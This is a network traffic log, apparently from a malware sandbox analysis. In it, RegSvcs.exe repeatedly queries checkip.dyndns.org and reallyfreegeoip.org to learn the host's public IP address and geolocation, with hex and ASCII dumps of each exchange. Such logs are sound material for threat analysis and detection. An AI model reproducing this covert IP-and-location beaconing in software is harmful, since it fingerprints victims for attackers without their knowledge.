Nov 18, 2024 18:21:22.190027952 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:22 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 26019d5eb4b2272351c3f5499bb44d20 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49714	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:23.034779072 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:21:23.909157038 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 74484ffe70226f28e56212bb3a6ecd4a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49716	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:25.089791059 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:25.975491047 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d1d0309f7bba1b0a146b92c5ba793ca2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49718	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:26.880819082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:27.791966915 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 197a7690d53780f3db9776b23e0a65ae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49721	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:28.277118921 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:29.156857967 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 520f429ba86481676a007b0d05d53cfe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:21:29.160865068 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:21:29.422700882 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1d26e60e82d3401135a428a38652ecba Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:21:30.392301083 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:21:30.663184881 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dfd34ed7a700e759b068cfc558255a24 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49723	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:28.699466944 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:29.555248022 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 00e830c6cbf813b9cd67842224134fca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49729	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:30.410052061 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:31.299364090 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee856a1c527e7dc6ab1c7f715812c38f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49733	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:31.505584955 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:21:32.474581957 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9c3ed2f8330839aa561375cf9461d288 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49735	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:32.232359886 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:33.369868040 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6a2c6bb56ef33cc031007a78d57b0e46 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:21:33.395868063 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6a2c6bb56ef33cc031007a78d57b0e46 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49748	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:33.567935944 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:21:34.471199989 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 65d15079c463bbcc2869054b081ceef0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49757	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:35.302304983 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:36.199075937 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 23a38b20a525c180c641ea83726f73b0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49767	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:37.063261986 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:37.943816900 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:37 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f21374e4daa455982e25f2139f077ac3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49778	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:38.794673920 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:39.673593998 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 88d5a46f107ac1062b88f8604e757d4e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49790	132.226.247.73	80	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:40.488154888 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:41.345062971 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:41 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b5d64ec7fd3bd4de4764d14cf63b899c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:21 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:21 UTC	841	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:21 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 549 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smE9GRd6a6ikUT1dvCkg7mpIIFS4Oi3rctFuubJCrw33jJMcyIIyA1Xa2BnbIqRR13893fEWsUu6VHReG5EiERq0dP3M1LENDHp5NR5KLEjo01HWZF8tC8JmdsSEVuqLzIfuofOE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a2ee3ade2c95-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24452&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118334&cwnd=32&unsent_bytes=0&cid=0fc97e2810e276e2&ts=281&x=0"
2024-11-18 17:21:21 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:22 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:23 UTC	846	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:22 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6520 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl1u5EsR9dfWMXJmB8ksQk4M49smrPI9DX73P38juLK3RgmfRamiSH1y2oB6zEviSdUJxQ1nJm3neyrk9Uff0xzjMjkjCgRN62A1jgrc8YA4QIppjtMj0bb%2Bb%2FffP8VCYA60dtTJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a2f63c00b0d9-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=144446&cwnd=32&unsent_bytes=0&cid=01233c463918e102&ts=185&x=0"
2024-11-18 17:21:23 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:24 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:25 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:25 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51959 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzM9vUEoCeSXN4TBgk7f4OYEEc7MUvPRa9j%2FWICYKhfEGhGxOn73HR1LTDR50uJxsyig4gt7em1Mvw6s2ta32nR%2Fhr8WwEcekVf%2F5%2FuWy6Vsvti4KktMm25rCtOTX3TRB8eu72Ab"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a3033eaae775-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18985&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=151893&cwnd=32&unsent_bytes=0&cid=5bf2be857224cefa&ts=164&x=0"
